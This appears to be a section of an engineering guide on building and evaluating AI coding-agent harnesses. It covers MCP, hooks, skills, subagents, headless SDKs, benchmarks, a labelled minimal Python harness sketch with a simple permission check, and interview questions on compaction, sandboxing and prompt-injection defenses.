10. Extensibility architecture

B7 covers configuration. This section covers implementation.

MCP client

The same pattern everywhere: spawn stdio servers or connect over streamable HTTP, list tools, namespace them (mcp__server__tool in Pi, mcp_server_tool in Gemini), and route calls through the same permission engine as built-in tools. Codex uses the Rust rmcp SDK (rmcp-client/). OpenCode and Gemini use @modelcontextprotocol/sdk. Pi wrote its own (packages/mcp). Two problems recur: tool-count bloat, solved by tool search, and OAuth for remote servers.

Hooks: the event model

HarnessEvents (abridged)Blocking semantics
Claude CodeSessionStart, UserPromptSubmit, PreToolUse, PermissionRequest, PostToolUse, Stop, SubagentStop, PreCompact … (~30)Exit code 2 blocks, and a JSON permissionDecision: "allow" can't override it. JSON decision: "block" also works. docs
CodexPreToolUse, PostToolUse, PermissionRequest, PreCompact, PostCompact, SessionStart, SessionEnd, Stop, SubagentStart/Stop, UserPromptSubmit, Interrupthooks/ crate (plus the legacy notify)
Gemini CLIBeforeTool, AfterTool, BeforeAgent, AfterAgent, BeforeModel, AfterModel, BeforeToolSelection, PreCompress, SessionStart/End, Notification0 allow, 1 warn, other codes (including 2) block (core/src/hooks/)
OpenCodetool.execute.before/after, permission.ask, chat.params, shell.env, experimental.session.compacting, tool.definition …In-process TypeScript plugin functions (plugin/src/index.ts)
Pitool_call (can mutate or block), tool_result, context, before_agent_start, session_before_compact …In-process TS extensions loaded with jiti; can also register tools, commands and providers (extensions.md)

There are two styles. Command hooks (Claude Code, Codex, Gemini) work in any language and can be centrally managed, but cost a process spawn per call. In-process plugins (OpenCode, Pi) are fast and can change anything, and they run with the harness's own privileges.

Skills and progressive disclosure

Every harness here except Aider supports skills, and the pattern is the same wherever it is documented. At startup they scan SKILL.md files and put only the frontmatter name and description (plus path) into the prompt. The body loads only when the task needs it. Claude Code has a Skill tool, OpenCode a skill tool, and Gemini an activate_skill tool. Pi "advertises each available skill by name and description, then loads its full instructions only when the task calls for them" (skills.md). Codex embeds system skills in its skills crate. OpenCode also scans .claude/skills and .agents/skills (skill/index.ts).

Subagents

A subagent is a tool that runs another loop with its own context, tools and permissions, and returns a summary. Codex exposes lifecycle tools (spawn_agent, wait_agent …). OpenCode's task creates a child session (task.ts). Gemini's invoke_agent reaches built-ins like codebase_investigator, markdown-defined agents, or remote A2A agents. Its local agents must call complete_task within 30 turns or 10 minutes by default (agents/types.ts).

Headless modes, SDKs, client/server

HarnessHeadlessSDK / server
Claude Codeclaude -p --output-format stream-jsonClaude Agent SDK (@anthropic-ai/claude-agent-sdk, claude-agent-sdk for Python), "a library that runs the Claude Code binary". It no longer uses Claude Code's system prompt unless you pass the claude_code preset. docs
Codexcodex exec --json (JSONL), --output-schema@openai/codex-sdk spawns codex exec --experimental-json (sdk/typescript/src/exec.ts). The Python openai-codex SDK talks to app-server over stdio.
OpenCodeopencode run --format jsonopencode serve HTTP server; @opencode-ai/sdk generated from OpenAPI
Gemini CLI-p --output-format json|stream-json@google/gemini-cli-sdk; a2a-server; --acp
Pi-p, --mode json--mode rpc (JSONL commands on stdin), createAgentSession() SDK

The trend is core as server, UIs as clients (Codex app-server, OpenCode server). For editors, Zed's Agent Client Protocol (JSON-RPC over stdio) standardizes the editor-to-agent link. Its site lists Gemini CLI, OpenCode, Goose and Cline as agents, with Claude Code and Codex via adapters. ACP site

Common mistake

Building the TUI first and bolting on headless mode later, which tangles events with rendering. Design the core as an event stream (turn_start, message_delta, tool_call, tool_result, approval_request, turn_end, usage) from day one, so the UIs, SDKs and evals all consume the same stream.

Go deeper

11. Evaluating a harness

Methodology is in B5. The key rule: change one variable and hold the model fixed.

External benchmarks

BenchmarkWhat it measuresStatus notes
SWE-bench VerifiedResolving real GitHub issues in Python repos, graded by hidden testsIts "Bash Only" view fixes the harness (mini-SWE-agent) to compare models. The other views compare model+harness systems. swebench.com
SWE-Bench Pro (Scale)1,865 tasks across 41 repos, including held-out and commercial code, to resist contaminationScale's own runs use the SWE-Agent scaffold. Scale 2025
Terminal-BenchHard terminal tasks in containers. The leaderboard pairs an agent with a model.Versions up to 4.0 as of Aug 2026; Terminus is the neutral reference harness. tbench.ai
Aider polyglot225 hard Exercism exercises in 6 languages: can the model edit code and produce a well-formed editReports pass rate and percent_cases_well_formed (benchmark/)
May be out of date

Benchmark versions and leaderboards change monthly, and public benchmarks saturate and leak into training data. Treat public scores as a sanity check. Your internal suite is what decides harness changes.

Internal evals: what the harness teams ship

Interview angle

A strong extra point: a change that adds 1 point of pass rate but doubles cost is usually a regression. Report both.

Go deeper

12. Build your own minimal harness

A compact Python coding agent: the loop, four tools, a permission check, truncation and a compaction stub, written against the Anthropic Messages API shape. It is a teaching sketch. Check the SDK calls against current docs before running it.

# mini_harness.py: teaching sketch, not production code.
import json, os, re, subprocess, pathlib
import anthropic

client = anthropic.Anthropic()               # reads ANTHROPIC_API_KEY
MODEL = os.environ["AGENT_MODEL"]            # set to a current model ID
ROOT = pathlib.Path.cwd().resolve()
MAX_STEPS, MAX_OUT, COMPACT_AT = 60, 20_000, 150_000   # chars / tokens (rough)
read_files: set[str] = set()                 # file-state tracking for the edit guard

def clip(s: str, limit: int = MAX_OUT) -> str:
    """Head+tail truncation: keep the start and (more importantly) the end."""
    if len(s) <= limit: return s
    h = limit // 2
    return s[:h] + f"\n…[{len(s)-limit} chars truncated]…\n" + s[-h:]

def safe_path(p: str) -> pathlib.Path:
    q = (ROOT / p).resolve()
    if not q.is_relative_to(ROOT): raise ValueError(f"{p} is outside the workspace")
    return q

# ---- tools -----------------------------------------------------------
def t_read(path, offset=0, limit=2000):
    lines = safe_path(path).read_text().splitlines()
    read_files.add(str(safe_path(path)))
    body = "\n".join(f"{i+1:6}\t{l}" for i, l in enumerate(lines[offset:offset+limit], offset))
    more = f"\n[{len(lines)-offset-limit} more lines; use offset]" if len(lines) > offset+limit else ""
    return clip(body) + more

def t_edit(path, old, new):
    f = safe_path(path)
    if str(f) not in read_files: return "Error: read the file before editing it."
    text = f.read_text(); n = text.count(old)
    if n == 0: return "Error: old text not found. It must match exactly, including whitespace. Re-read the file."
    if n > 1:  return f"Error: old text appears {n} times. Add surrounding lines to make it unique."
    f.write_text(text.replace(old, new, 1)); return f"Edited {path}."

def t_write(path, content):
    f = safe_path(path); f.parent.mkdir(parents=True, exist_ok=True)
    f.write_text(content); read_files.add(str(f)); return f"Wrote {len(content)} chars to {path}."

def t_bash(command, timeout=120):
    try:
        r = subprocess.run(command, shell=True, cwd=ROOT, capture_output=True, text=True, timeout=timeout)
        return clip(f"exit={r.returncode}\n{r.stdout}{r.stderr}")
    except subprocess.TimeoutExpired:
        return f"Error: timed out after {timeout}s. Use a narrower command or a longer timeout."

TOOLS = {"read": t_read, "edit": t_edit, "write": t_write, "bash": t_bash}
SCHEMAS = [
  {"name": "read", "description": "Read a text file with line numbers. Use offset/limit for large files.",
   "input_schema": {"type": "object", "properties": {"path": {"type": "string"},
     "offset": {"type": "integer"}, "limit": {"type": "integer"}}, "required": ["path"]}},
  {"name": "edit", "description": "Replace one exact, unique occurrence of `old` with `new`. Read the file first.",
   "input_schema": {"type": "object", "properties": {"path": {"type": "string"},
     "old": {"type": "string"}, "new": {"type": "string"}}, "required": ["path", "old", "new"]}},
  {"name": "write", "description": "Create or overwrite a file with full content.",
   "input_schema": {"type": "object", "properties": {"path": {"type": "string"},
     "content": {"type": "string"}}, "required": ["path", "content"]}},
  {"name": "bash", "description": "Run a shell command in the repo root. Output is truncated; filter it (e.g. | tail -50).",
   "input_schema": {"type": "object", "properties": {"command": {"type": "string"},
     "timeout": {"type": "integer"}}, "required": ["command"]}},
]

# ---- permissions (deliberately simple; see section 7 for the real thing) ----
SAFE = re.compile(r"^(ls|cat|grep|rg|find|git (status|diff|log)|pytest|python -m pytest)\b")
SEPARATORS = re.compile(r"(&&|\|\||;|\||`|\$\(|>|\n)")

def allowed(name, args) -> bool:
    if name in ("read",): return True
    if name == "bash":
        cmd = args["command"].strip()
        if not SEPARATORS.search(cmd) and SAFE.match(cmd): return True   # no chaining tricks
    ans = input(f"\nAllow {name} {json.dumps(args)[:200]}? [y/N] ")
    return ans.strip().lower() == "y"

# ---- context management stub ----
def maybe_compact(messages, usage_in):
    if usage_in < COMPACT_AT: return messages
    summary = client.messages.create(model=MODEL, max_tokens=2000,
        system="Summarize this coding session for another engineer: goal, constraints the user stated, "
               "decisions, files changed, current state, next step. Be specific.",
        messages=messages + [{"role": "assistant", "content": "(pausing to summarize)"},
                            {"role": "user", "content": "Write the summary now."}]).content[0].text
    return [{"role": "user", "content": f"[Summary of earlier work]\n{summary}\n\nContinue the task."}]
    # NB: a real version cuts at a turn boundary and keeps recent turns verbatim.

SYSTEM = (f"You are a coding agent working in {ROOT}. Use tools to inspect, edit and test. "
          "Verify with tests before saying you are done. Be concise.")
if (ROOT / "AGENTS.md").exists(): SYSTEM += "\n\n# Project instructions\n" + (ROOT / "AGENTS.md").read_text()[:32_000]

def run(task: str):
    messages = [{"role": "user", "content": task}]
    for step in range(MAX_STEPS):
        resp = client.messages.create(model=MODEL, max_tokens=8000, system=SYSTEM,
                                      tools=SCHEMAS, messages=messages)
        messages.append({"role": "assistant", "content": resp.content})
        for b in resp.content:
            if b.type == "text": print(b.text)
        if resp.stop_reason != "tool_use": return            # turn complete
        results = []
        for b in resp.content:
            if b.type != "tool_use": continue
            if not allowed(b.name, b.input):
                out, err = "Denied by user. Try a different approach or ask.", True
            else:
                try:    out, err = TOOLS[b.name](**b.input), False
                except Exception as e: out, err = f"Error: {e}", True   # errors go back to the model
            results.append({"type": "tool_result", "tool_use_id": b.id, "content": out, "is_error": err})
        messages.append({"role": "user", "content": results})
        messages = maybe_compact(messages, resp.usage.input_tokens)
    print("Stopped: step limit reached.")

if __name__ == "__main__":
    run(input("Task: "))
Common mistake

The stub replaces all history. Production versions (Pi, Codex) keep recent turns verbatim and cut only at safe points.

What to add next: the ladder

  1. Prompt caching breakpoints (B1).
  2. Streaming, interrupts, process-group kill, synthetic results for unfinished calls.
  3. Jittered retries that honor retry-after.
  4. tree-sitter shell parsing, deny-wins rules, narrowed approvals.
  5. OS sandbox with default-deny network, or a container.
  6. JSONL session log with resume, then shadow-git snapshots.
  7. Better edits: normalized fallback, multi-edit, lint/LSP diagnostics.
  8. Grep/glob, todo and subagent tools.
  9. Real compaction: clear tool output first, safe cut, structured summary.
  10. Provider abstraction and per-model tools and prompts.
  11. MCP, hooks, skills, headless JSONL mode.
  12. An eval harness: fixed tasks, k runs, cost tracking, trajectory viewer.
Interview angle

In a live exercise, write the loop plus bash and a uniqueness-checked edit, then talk through the ladder in order. Interviewers want to see prioritization: safety and context before features, evals before tuning.

Go deeper

Interview question bank

Design a coding-agent harness from scratch.

Clarify the scope (local or cloud, one model or many), then build an event-streaming core (turn loop, retries, interrupts, step and cost limits) behind a protocol, so TUI, IDE, headless and SDK are all clients, as in Codex's app-server and OpenCode's server. Add a provider layer with one internal message model, and a prompt assembler ordered for caching. Keep the tool set small: read, exact-unique edit, write, bash, search, todo, subagent, all with capped output. Then a context manager (prune tool output, then structured compaction), a policy engine plus an OS sandbox with default-deny network, a session log with resume and shadow-git snapshots, and MCP, hooks and skills. Build the eval suite before tuning.

How would you implement context compaction?

Trigger on provider-reported input tokens, leaving headroom for the summary call and the next response (Pi: window − 16,384; Codex: 90%). First clear old tool outputs, which is cheap. Then cut at a turn boundary, never between a tool call and its result. Keep recent turns verbatim and summarize the rest with a template: goal, user constraints, decisions, files touched, progress, next step. Re-inject AGENTS.md. Keep the raw log, cap attempts to avoid thrashing, and eval on long tasks that depend on an early constraint.

Search/replace vs unified diff vs whole-file edits: trade-offs?

Whole file is reliable for small files, but expensive, and it invites "rest unchanged" elisions. Search/replace (or a string-replace tool) is cheap and reviewable. It fails loudly on a mismatch, so pair it with a uniqueness check and an actionable error. Unified diff is familiar from pre-training, but models get line numbers wrong, so practical variants (Aider udiff, Codex apply_patch) locate hunks by context instead. Aider measured GPT-4 Turbo going from 20% to 61% on its laziness benchmark by switching to udiff. The best format depends on the model and what it was trained on, so A/B the formats per model.

How do you make a harness work across multiple model providers?

One internal representation for messages, tool calls, thinking and usage. One adapter per wire API (Anthropic Messages, OpenAI Responses, OpenAI-compatible, Gemini), not per vendor. A transform pass for provider quirks (empty content, tool-ID formats, required reasoning fields). Drop or convert thinking blocks when the model changes. Cache breakpoints live in the adapter. A model registry holds windows, prices and capabilities. Prompts and tools are selectable per model. Run evals per model, and gate provider-only features behind capability flags.

How do you evaluate a harness change?

Hold the model, sampling settings and tasks fixed, and change one harness variable. Use real-repo tasks with automated checks, plus targeted behavioral cases. Run several trials per arm and report confidence intervals, plus pass^k for consistency. Track cost per solved task, turns, latency, edit-failure rate and prompts per task. Read the failing trajectories and bucket the causes. Ship behind a flag and watch interrupts and rewinds.

How do you implement a permission system for shell commands?

Parse with tree-sitter-bash into sub-commands, splitting across &&, ||, ;, pipes, subshells and substitutions, and unwrap bash -c and env. Deny if any sub-command matches a deny rule. Allow only if all match allow rules. Otherwise use the mode default and danger heuristics, and ask, or deny when headless. Store "always allow" as an arity-narrowed prefix (git push *, not git *). Then say it's advisory. The real boundary is an OS sandbox with filesystem and network limits.

Why might a minimal harness beat a feature-rich one?

Every tool schema and prompt paragraph costs context on every call, and every extra tool is another wrong choice the model can make. Strong models already know bash. mini-swe-agent, with one bash tool and a linear history, was reported at 65% on SWE-bench Verified. You lose structured diffs, per-tool permissions and undo. Pi's answer is a minimal core with extensible edges.

How should tool output be truncated?

Always cap it. For command output keep the tail, where errors and summaries are, or head plus tail with a marker (Codex: 10k tokens). For file reads keep the head and offer offset/limit. The best pattern is spill-to-file: save the full output and return the path so the model can grep it (OpenCode, Pi, Gemini). Always tell the model that output was cut and how to get the rest.

Policy layer vs sandbox: why both?

The policy decides whether an action runs. The sandbox limits what it can do once it runs. Policies can be bypassed by indirection, and a sandbox without policy either over-restricts or needs constant escalation. Codex combines them: with sandbox mode workspace-write and approval policy on-request, routine commands run unprompted inside the sandbox, and the model asks only to escalate. That cuts prompt fatigue without giving up safety.

How do you implement undo/checkpoints?

Per-edit file snapshots (Claude Code) miss bash-made changes. Real commits (Aider) are honest but clutter history. A shadow git repo (OpenCode, Gemini) captures every change without touching the user's repo: git --git-dir=<private> --work-tree=<repo> plus write-tree per step. Offer file restore and conversation restore as separate operations. Codex's thread/revert only rewinds history, which is itself a product choice.

How do you handle parallel tool calls safely?

Classify tools as parallel-safe (reads, search) or exclusive (writes, side-effecting shell). Codex uses an RwLock: read guard for safe tools, write guard for the rest. Serialize writes per file. Show permission prompts one at a time. Return results in call order with matching IDs, and on abort give every call a result.

Your agent keeps repeating the same failing command. What do you build?

Loop detection: exact repeats (OpenCode asks after 3), cycle and content-repeat detection, and optionally an LLM judge (Gemini). On the first detection, inject "step back" feedback. On the second, stop and hand control to the user. Then fix the cause, which is usually an unhelpful error or truncation that hid the real error, and add the case to the regression suite.

Why use freeform/grammar tools instead of JSON tool calls?

Code inside JSON needs escaping, costs tokens, and looks unlike pre-training data. Codex's apply_patch is a freeform tool constrained by a Lark grammar, so the model writes a raw patch that is guaranteed to parse. Aider skipped tool calling entirely for edits. The cost: grammar tools are provider-specific, and text formats need your own robust parser.

How should subagents be designed, and when are they worth it?

A subagent runs a separate loop with fresh context and restricted tools, and returns only a summary. That suits search-heavy exploration and parallel investigation. Give it explicit termination and budgets (Gemini: complete_task, 30 turns, 10 minutes) and its own permission set (OpenCode's explore). Avoid subagents for tightly coupled edits, where the parent loses detail it needs. See B4.

What can the harness do about prompt injection through repo content?

AGENTS.md, READMEs, issues, web pages and MCP results all reach the context. Mitigations: trust gates before loading project config or hooks; default-deny network; secrets outside readable paths; approval for out-of-workspace writes and network; untrusted labels on fetched content; compaction prompts that refuse injected instructions (Gemini); and injection cases in the evals. None is enough alone. See B5.